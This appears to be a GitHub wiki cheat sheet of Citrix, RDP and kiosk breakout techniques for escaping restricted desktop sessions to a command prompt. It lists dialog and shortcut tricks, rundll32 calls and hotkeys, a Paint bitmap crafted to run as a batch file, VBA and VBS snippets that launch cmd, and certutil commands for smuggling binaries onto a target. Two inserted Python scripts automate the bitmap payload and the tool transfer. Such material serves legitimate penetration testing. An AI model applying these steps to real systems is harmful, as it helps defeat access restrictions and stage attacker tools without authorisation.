Citrix Breakout Techniques - CraigDonkin/Infrastructure GitHub Wiki
- Save as / Open as
- Print features
- Right click and open any apps you have access to; see if any of their functionality opens up dialogue boxes to play with
- Create new files
- Create batch files
- Create shortcuts to "%WINDIR%\system32"
- Open new explorer windows
- Properties > Open File Location
- Enter file paths
  - //127.0.0.1/C$
  - C:\
- Right click > Properties > Target
  - file:///c:/windows/system32/
  - \\127.0.0.1\c$\Windows\System32
- Windows + F1
  - Search for "command prompt" and use the help links to load a command prompt
  - Search for other things that could open an explorer window, or a link to a website that loads IE
- View Source > Notepad
- Print > Print Dialog
- Dialog box (Windows Search / Libraries)
  - Search for a string
  - Click Custom
  - Add a search path for C:
  - Expand C > Right click a sub directory > Include in Library > Create new library
%ALLUSERSPROFILE%
%APPDATA%
%CommonProgramFiles%
%COMMONPROGRAMFILES(x86)%
%COMPUTERNAME%
%COMSPEC%
%HOMEDRIVE%
%HOMEPATH%
%LOCALAPPDATA%
%LOGONSERVER%
%PATH%
%PATHEXT%
%ProgramData%
%ProgramFiles%
%ProgramFiles(x86)%
%PROMPT%
%PSModulePath%
%Public%
%SYSTEMDRIVE%
%SYSTEMROOT%
%TEMP%
%TMP%
%USERDOMAIN%
%USERNAME%
%USERPROFILE%
%WINDIR%
shell:Administrative Tools
shell:DocumentsLibrary
shell:Libraries
shell:UserProfiles
shell:Personal
shell:SearchHomeFolder
shell:System
shell:NetworkPlacesFolder
shell:SendTo
shell:Common Administrative Tools
shell:MyComputerFolder
shell:InternetFolder
about:
data:
ftp:
mailto:
news:
res:
telnet:
view-source:
- \\127.0.0.1\c$\Windows\system32
- cmd.exe
- command.com
- powershell.exe
- Windows + Run
- File browser
- drag + drop
- Hyperlink/Shortcut
- Task Manager > New Task > Run
- Task Scheduler > New task to run cmd.exe
- cmd.exe /C
- cmd.exe /K
- Paint trick: in MS Paint make a 6x1 pixel image and set the six pixels, left to right, to:
  1st: R: 10, G: 0, B: 0
  2nd: R: 13, G: 10, B: 13
  3rd: R: 100, G: 109, B: 99
  4th: R: 120, G: 101, B: 46
  5th: R: 0, G: 0, B: 101
  6th: R: 0, G: 0, B: 0
- Save as 24-bit bitmap
- Change the extension to .bat and run it (a 24-bit BMP stores each pixel as B,G,R bytes, so the pixel row spells "cmd.exe" on its own line after the header)
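As an added example (not from the wiki), the following Python script, run on your own machine, builds the same 6x1 24-bit bitmap from the six colours above and shows why they were chosen: a 24-bit BMP stores each pixel as B,G,R bytes, so the pixel row decodes to a line containing cmd.exe. The batch_lines helper is an assumed model of how cmd.exe reads the file (LF-delimited, CR and NUL ignored); the 54-byte header contains no line break, so cmd sees it as one garbage command that fails before the cmd.exe line runs.

```python
import struct

# The six pixel colours from the page, left to right, as (R, G, B).
PIXELS = [(10, 0, 0), (13, 10, 13), (100, 109, 99), (120, 101, 46), (0, 0, 101), (0, 0, 0)]


def pixel_row(pixels=PIXELS):
    """Encode one BMP scanline: 24-bit BMP stores B,G,R per pixel and pads rows to 4 bytes."""
    row = b"".join(bytes((b, g, r)) for r, g, b in pixels)
    row += b"\0" * ((4 - len(row) % 4) % 4)
    return row


def build_bmp(pixels=PIXELS):
    """Return a minimal 6x1 24-bit bitmap (54-byte header + one row), equivalent to Paint's save."""
    row = pixel_row(pixels)
    width, height = len(pixels), 1
    # BITMAPFILEHEADER: magic, file size, two reserved words, offset of the pixel data
    file_header = struct.pack("<2sIHHI", b"BM", 14 + 40 + len(row), 0, 0, 54)
    # BITMAPINFOHEADER: size, width, height, planes, bpp, compression, image size,
    # x/y pixels per metre, colours used, important colours
    dib_header = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0, len(row), 0, 0, 0, 0)
    return file_header + dib_header + row


def batch_lines(blob):
    """Assumed model of cmd.exe's batch reader: LF separates lines, CR and NUL are dropped."""
    return [ln.replace(b"\r", b"").replace(b"\0", b"").decode("latin-1") for ln in blob.split(b"\n")]


def embedded_command(blob):
    """The last non-empty line is what the batch interpreter ends up executing."""
    return [ln for ln in batch_lines(blob) if ln][-1]


if __name__ == "__main__":
    bmp = build_bmp()
    print(pixel_row().hex(" "))   # 00 00 0a 0d 0a 0d 63 6d 64 2e 65 78 65 00 00 00 00 00 00 00
    print(embedded_command(bmp))  # cmd.exe
    with open("cmd.bat", "wb") as f:  # the same file you get by renaming Paint's .bmp to .bat
        f.write(bmp)
```

The first pixel's 0x0A byte terminates the header line, the second pixel supplies CRLF plus a leading CR that cmd discards, and pixels three to five carry the seven ASCII bytes of cmd.exe; the sixth pixel and the row padding are NUL bytes that the interpreter ignores.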
- !dir
- C:\Users\User\AppData\Local\temp
- C:\temp
- Address Bar > file://
- Menus
  - help
  - search
- Right click > View Source > notepad
- Right click > Save picture as > Explorer
- Set homepage to cmd.exe
- F12 (Developer Tools) > File > Customize Internet Explorer view source > cmd.exe
- Certificate > Import > IE (the import wizard opens a file browse dialog)
- ActiveX plugins
- Browser exploit
- VBA macro
Sub OpenCMD()
    ' Launches cmd.exe from an Office macro; vbNormalFocus gives the new window focus
    Shell "CMD /K C:\windows\system32\cmd.exe", vbNormalFocus
End Sub
- ActiveX Controls
- XP command shell
- Dialog box and shortcut exploitation
InitialProgram=cmd.exe
- RDP + Citrix
A good way of getting tools onto the box if you only have copy and paste of text: use certutil to turn the file into base64 on your own machine, paste the text into a file on the target, then use certutil to turn it back into the binary.
certutil -encode cmd.exe cmd.txt
certutil -decode cmd.txt cmd.exe
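As an added example (not part of the wiki), this Python script for the attacker's own machine produces text in the layout certutil -encode writes (PEM-style header and footer, 64-character base64 lines, CRLF endings), so a Linux host without certutil can still prepare the paste, and it mirrors the decode for a local round-trip check. The paste_chunks helper and its 200-line default are assumptions for clipboards that truncate large pastes; the sha256 output is for comparison with certutil -hashfile on the target.

```python
import base64
import hashlib

BEGIN = "-----BEGIN CERTIFICATE-----"
END = "-----END CERTIFICATE-----"


def certutil_encode(data: bytes) -> str:
    """Text in the layout `certutil -encode` writes: PEM-style header and footer around
    base64 in 64-character lines with CRLF endings, so `certutil -decode` accepts it unchanged."""
    b64 = base64.b64encode(data).decode("ascii")
    lines = [BEGIN] + [b64[i:i + 64] for i in range(0, len(b64), 64)] + [END]
    return "\r\n".join(lines) + "\r\n"


def certutil_decode(text: str) -> bytes:
    """Mirror of `certutil -decode` for checking a paste locally: drop header/footer
    lines and whitespace, then base64-decode what is left (plain base64 also works)."""
    body = "".join(ln.strip() for ln in text.splitlines()
                   if ln.strip() and not ln.strip().startswith("-----"))
    return base64.b64decode(body, validate=True)


def paste_chunks(text: str, max_lines: int = 200) -> list:
    """Assumed helper: split the encoded text into pastes of at most max_lines lines for
    clipboards that truncate; pasted back in order into one file they decode normally."""
    lines = text.splitlines(keepends=True)
    return ["".join(lines[i:i + max_lines]) for i in range(0, len(lines), max_lines)]


def sha256_hex(data: bytes) -> str:
    """Compare with `certutil -hashfile <file> SHA256` on the target to confirm the transfer."""
    return hashlib.sha256(data).hexdigest()


if __name__ == "__main__":
    import sys
    # Usage: python certutil_b64.py tool.exe > tool.txt
    # Paste tool.txt into Notepad on the target, save it, then: certutil -decode tool.txt tool.exe
    with open(sys.argv[1], "rb") as f:
        payload = f.read()
    sys.stdout.write(certutil_encode(payload))
    sys.stderr.write("sha256 " + sha256_hex(payload) + "\n")
```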
mmc.exe
mstsc.exe
regedit.exe
taskmgr.exe
control.exe
rundll32.exe
dxdiag.exe
msconfig.exe
eventvwr.exe
systeminfo.exe
msinfo32.exe
osk.exe
at.exe
taskschd.msc
wmic.exe
qwinsta.exe
tasklist.exe
*.exe
*
*.*
- Right click > Open
- File protocol handlers in address bar
- File shortcuts
- drag + drop execution
rundll32.exe is used to execute DLL functions from the command line, including native API calls to management consoles, many of which open dialogs with file browse buttons:
Add/Remove Programs: RunDll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,0
Content Advisor:
Control Panel: RunDll32.exe shell32.dll,Control_RunDLL
Device Manager: RunDll32.exe devmgr.dll DeviceManager_Execute
Folder Options - General: RunDll32.exe shell32.dll,Options_RunDLL 0
Folder Options - Search: RunDll32.exe shell32.dll,Options_RunDLL 2
Forgotten Password Wizard: RunDll32.exe keymgr.dll,PRShowSaveWizardExW
System Properties: Advanced: RunDll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,4
Taskbar Properties: RunDll32.exe shell32.dll,Options_RunDLL 1
User Accounts: RunDll32.exe shell32.dll,Control_RunDLL nusrmgr.cpl
Windows Firewall: RunDll32.exe shell32.dll,Control_RunDLL firewall.cpl
Sticky Keys - press Shift 5 times
Mouse Keys - Shift + Alt + Num Lock
High Contrast - Shift + Alt + Print Screen
Toggle Keys - hold Num Lock for 5 seconds
Filter Keys - hold Right Shift for 8 seconds
WINDOWS+F1 - Windows Help and Support (its search box is another way in)
WINDOWS+D - Show Desktop
WINDOWS+E - Launch Windows Explorer
WINDOWS+R - Run
WINDOWS+U - Ease of Access Centre
WINDOWS+F - Search
SHIFT+F10 - Context Menu
CTRL+SHIFT+ESC - Task Manager
CTRL+ALT+DEL - Windows Security screen on newer Windows versions (lock, switch user, Task Manager)
F1 - Help
F3 - Search
F6 - Address Bar
F11 - Toggle full screen within Internet Explorer
CTRL+H - Internet Explorer History
CTRL+T - Internet Explorer - New Tab
CTRL+N - Internet Explorer - New Window
CTRL+O - Open File
CTRL+S - Save
CTRL+N - New
RDP session keys:
CTRL+ALT+END - Opens the Windows Security dialog box (Ctrl+Alt+Del inside the session)
CTRL+ALT+BREAK - Switches between windowed and full-screen
ALT+INSERT - Cycles through windows
ALT+HOME - Displays the Start menu
ALT+DELETE - Displays the window's control / context menu
CTRL+ALT+NUMBER PAD MINUS - Takes a screenshot of the active window onto the RDP clipboard
CTRL+ALT+NUMBER PAD PLUS - Takes a screenshot of the entire RDP session onto the RDP clipboard
Citrix ICA session keys:
SHIFT+F1 - Displays the Windows Task List
SHIFT+F2 - Toggles the title bar
SHIFT+F3 - Closes the remote application / Citrix connection
CTRL+F1 - Displays the Windows NT Security desktop (Ctrl+Alt+Del inside the session)
CTRL+F2 - Displays the remote task list or Start Menu
CTRL+F3 - Displays Task Manager
ALT+F2 - Cycles through maximised and minimised windows
ALT+PLUS - Cycles through open windows
ALT+MINUS - Cycles through open windows (reverse)
' Save as a .vbs file and run it (double-click, or wscript.exe/cscript.exe) to launch cmd via the scripting host
Set objApp = CreateObject("WScript.Shell")
objApp.Run "CMD C:\"